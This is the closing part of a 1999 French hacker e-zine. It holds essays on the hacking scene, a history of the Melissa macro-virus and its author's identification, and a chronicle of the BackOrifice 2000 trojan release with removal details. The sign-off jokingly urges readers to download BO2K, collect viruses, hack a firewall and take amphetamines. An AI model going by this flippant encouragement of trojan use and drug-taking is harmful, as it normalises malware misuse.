cela me semble un bon choix. Reflechissez-y et contactons nous. Car ce n'est
pas evident...

En effet, l'interessement pour le Hack s'accroit de jour en jour et les
intentions ne sont pas toutes bonnes; qu'il est chiant de voir
un gars demander encore au stade du "windoz 98 est 100 X mieux que 95,
Bill Gates, il est  vachement fort et riche, quand il etait" petit, c'etait
un Haxor, je veux etre comme lui!" puis "Quel langage de prog il faut que
j'apprene pour pourvoir faire pieger quelqu'un et etre capable de pouvoir lui
voler son acompte mail", ..etc..


 De nos jours les medias en font une mode, a nous de savoir si cela restera
benin, ou s'il ne s'agit pas d'une faille a colmater avant que les bouseux ne
viennent faire du hack a la barbare par milliers en exitant toutes les
polices specialisees dans le 'crime informatique'; qui seront petit a petit
au courant des pratiques et de leurs mises en places.

A nous de voir.



0x04. outro

Voila, tel est mon point de vue, et en tant que point de vue ce ne peut
etre la realite, juste un avis. Neanmoins, la realite ne depend t'elle pas
du point de vue? Si, justement, la realite depend de la perception. La
realite reelle n'existe pas, cela ne veux absolument rien dire. C'est une
vue de l'esprit. Sur notre terre nous avons des fous et des autistes.
Les autistes vivent dans leur monde qui n'existe qu'en eux, leur
realite est alors differente de la notre. Pareil: si le monde etait rempli
de fous souffrant de la meme folie, alors les gens que nous considerons
comme normaux seraient alors enfermes dans des asiles.



Blunt
[blunt@mail.dotcom.fr]




+-----[ #13 ]-----------------------------------------------------------------+


                    Melis-sa-va-peter !!!
                                             SyntaxError, syntax3rror@usa.net

    Desole d'etre un peu en retard (juste 3 mois :) mais j'aimerais revenir
sur l'affaire Melissa, du nom du virus apparus pour la premiere fois le
Vendredi 26 Mars 99, sur des newsgroups pornos...

    Bon je vais re-expliquer rapidement (et ca sera la derniere fois :o) quels
sont les principes du virus Melissa. C'est un macro-virus qui necessite
Outlook Express et Word pour fonctionner. Il se transmet par email comme un
fichier Word 'list.doc' dans lequel on trouve une liste de sites de cul. La
macro s'execute quand la victime lit cette liste qu'un contact lui a envoye
(involontairement bien-sur :). Le virus renvoie cet email aux 50 premiers noms
du carnet d'adresses de OutLook. Ainsi en un double-clic on envoie 50 emails
(au plus) qui vont eux-memes se demultiplier tres rapidement.

    L'original (la reine mere quoi, comme dans 'The Faculty' :)) a ete publie
par 'SkyRocket', depuis un compte AOL: C'est ce que les compagnies d'antivirus
ont determine en premier. D'ailleurs - sans vouloir changer de sujet - je suis
admiratif devant le boulot accompli par ces gens. Je parle pas de Mr Norton
mais plutot d'AVP. Parmi toutes les saloperies que je telecharge sur le net,
j'ai toujours des surprises quand je redecouvre les archives juste apres une
mise-a-jour d'AVP. Les dernieres en date: 'cracked_Bleem!' et 'Divine
Intervention3' (si ca peut vous servir). En tout cas les trojans les plus
vicieux sont ceux qui ne s'installent pas et qui ne fonctionnent que quand le
soft tourne, la bonne vieille backdoor de merde quoi... (c'est le cas de
DivineIntervention3).

    Bon... j'arrete la mon delire sur les trojans... Les p'tits gars d'AVP et
de Norton etaient donc la pour griller le diffuseur de Melissa: SkyRocket.
C'est la que ca se complique... Enfin, dans les faits, c'est simple: C'est
Richard Smith, le boss de 'Phar Lap Software' qui parvient a retrouver
SkyRocket. Ce gars la ne vous dit rien ?! Normal ! Pourtant, aux Etats-Unis,
pays ou meme le cDc interesse les medias, ce gars la a fait dernierement
parler de lui pour sa decouverte du GUID (Global Unique IDentifier) qui
attribue a chaque PC sous Windows95, 98 et NT un numero personnel qui laissera
gentiment Micro$oft vous enregistrer 'comme y fô' si ca vous dit de passer par
micro$oft.com... voila pour les rejouissances... 

      Richard Smith est donc le gars qui a decouvert le GUID,
mais il est aussi le gars qui a UTILISE le GUID pour choper un type !!! c'est
terrible !! Le gars il trouve un truc mortel qui nuit a la liberte de la
personne, un outil d'espionnage etablit en secret par le tout-puissant M$, et
ce gros connard, qu'est-ce qu'il fait ? Il joue au super heros avec son
nouveau gadget ! Putain ca me les coupe !!! Et bien sur ce gars la va
participer aux recherches et aboutir a la decouverte de deux noms dont l'un
est David Smith. Ils portent le meme nom mais je doute que l'un aurait
balance l'autre si ils etaient de la meme famille... Un autre gars est mis en
cause: 'VicodinES' qui n'est pas l'auteur de Melissa; Bien qu'implique dans la
creation de virus et fortement suspecte .

     Le lundi, Richard Smith balance ses noms au FBI, mais ils s'en foutent un
peu. Effectivement, Fox Mulder et Dana Scully etaient deja en train d'examiner
le cas d'un extra-terrestre infiltre dans les services d'AOL... Enfin pas
vraiment mais chez AOL ils menaient deja leur propre enquete et ont aboutit a
l'identification de David Smith. D'ailleurs ils ont l'habitude de 'collaborer'
(le mot n'est pas choisi au hasard) avec le FBI pour identifier des
'cyber-criminals'. Ils leur laissent par exemple l'acces a leurs serveurs pop.
Le FBI peut chercher par mot-cle dans les emails persos des americains !!
Imaginez la scene: Le gars du FBI tape son mot-cle: 'H.A.C.K.E.R.'. la reponse:
'12,454,448 documents matching'. En clair ils ont du taf parce que pour trier
autant d'emails, c'est 'Mission: Impossible' !

    Bilan de l'histoire: Micro$oft est au sommet de la pyramide :(. Leur
technologie est d'abord la base du virus Melissa: Le couple Word / OutLook a
montre ses faiblesses. Mais l'espionnage systematique (le GUID) a permis de
sauver les apparences; et Richard Smith est un gros con - ca ne s'oublie pas...
La lutte contre M$ aura des jours meilleurs :o).

                                               SyntaxError, syntax3rror@usa.net




+-----[ #14 ]-----------------------------------------------------------------+


                  BackOrifice 2000 aka BO2k,
                  Chronique d'un coup mediatique :)


     BackOrifice 2000 se sera fait attendre ! Annoncee depuis plus d'un mois et
prevue pendant le DEF CON 7 a Las Vegas, la sortie de BO2k aura finalement eu
plus d'une journee de retard. Entre le 10 juillet et la sortie effective
(autour du 12 juillet), toutes les URLs du cDc sont saturees, et quand par
miracle on parvient a entrer sur www.cultdeadcow.com/tools/bo2k, c'est pour se
faire jeter par une unique page sous forme de reponse d'email (fictive ?) dont le
message est simple: "Nous ne pourrons vous livrer BO2k que si vous nous payez la
somme de 1 million de dollars", en anglais dans le texte of course.

    Les premieres apparutions de BO2k sur le net venaient de CDs jetes a la foule
lors du DEF CON et dupliques sur-le-champ ou uploades directement sur FTP. Mais
warning ces CDs etaient infectes par CIH...


    C'est le secret de la reussite annoncee de BO2k: le coup mediatique. Et les
membres du cDc sont plutot habiles: Leur but est le meme qu'il y a un an: faire
porter la resonsabilite de la mauvaise utilisation de BO2k sur MicroSoft et sur
l'absence de reel systeme de securite dans Windows.
    "We want to raise awareness to the vulnerabilities that exist within the Windows
operating system. We believe the best way to do this is by pointing out its
weaknesses.", Sir Dystic.

    Cette fois-ci, ils ont davantage d'atouts techniques pour provoquer des crises
de nerf et des depressions nerveuses a Redmond:

    - BO2k supporte Win9x et WinNT. La menace de l'insecurite plane ainsi egalement sur
les entreprises qui vont avoir du mal a avaler la pilule une fois que quelques cas
de hack grace a BO2k auront ete mediatises.

    - Il est Free Software sous licence GPL. N'importe quel plouk de l'uzbekistan peut
changer lui-meme les cles du registre utilisees par BO2k, le nom du serveur et le port.
Les versions 'mutantes' vont egalement pulluler rapidement ce qui va rendre le travail
des antivirus tres delicat...

    - Il utilise l'UDP ou le TCP.

    Les possibilites du trojan ne sont pas surprenantes. Il dispose de toutes les fonctions
classiques des trojans actuels. L'interet n'est pas dans la technique mais dans la
mobilisation des masses. D'ici a quelques mois plusieurs centaines de milliers de copies
auront deja ete telechargees un peu partout et il sera le trojan le plus connu et le plus
utilise. Il sera egalement une bonne publicite pour les trojans les moins connus. Eux seuls,
par leur nombre et leur diversite sont vraiment dangereux pour l'utilisateur moyen.

 "I don't worry about programs that receive this kind of fanfare because everybody knows
 about them, we worry about the ones nobody is bragging about.", 
 Daniel Cohen, president de Strategic Microsystems


    Quelques infos pour la desinstallation de BO2k:

le serveur est dans C:\Windows\System\UMG32.EXE
la clée: HKEY_LOCAL_USERS\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\UMG32.exe

________________________________________________________________________________________

   "Information is a virus. And we intend to infect all of you." , cDc
________________________________________________________________________________________

                                                SyntaxError, syntax3rror@usa.net




mOT.dE.lA.fIN :
----------------->>

Et oui, car c'est bel et bien la fin......bon, d'accord, c'est pas l'apocalypse,
ou alors juste un toute petite,... juste la fin de ce ezine :))
Bon, j'espere que tout ces articles vous ont plus, il y a eu du bon boulot de fait
je crois, donnez moi votre avis, comme d'hab.
Le mois prochain on remet ca et on rajoute a cette hecatombe les sequelles des 
articles de ce numero plus le maximum d'actualite de la scene, des articles
techniques (ptet linux, ptet d'la prog'), etc...
J'espere aussi posez une pierre (tombale) sur l'edifice Windoz le mois prochain ;)) 
En attendant: passez de bonnes vacances, crachez bien sur Billou, n'achetez pas windoz,
downloader BO2K, commencez une collection de virii, envoyez moi du fric, avalez pas vos
amphes avec du white spirit meme si vous avez pas de bieres (si si, j'vous jure, c'est 
dangereux), apprenez l'asm et commencez a debuggez windoz (c pour la bonne cause), 
allez hacker le firewall du Windoz CE de la maison de billou, etc... etc.. en gros,
amusez bien vous........hu... non,non, je pas inverse les mots quand j'ecrit... ;)
 
ps: desinstallez windoz 98b et reinstallez win95a, c pareil sauf que c plus leger 
(install custom:50mo) ... ou installez carrement Linux, meme si c'est pas mieux....
d'ailleurs si c'est pas mieux, c'est juste parce que c'est pas comparable !!! :ppp 


http://lutin.freeshell.org

mailto: lutin@listbot.com



[# E0F #]------+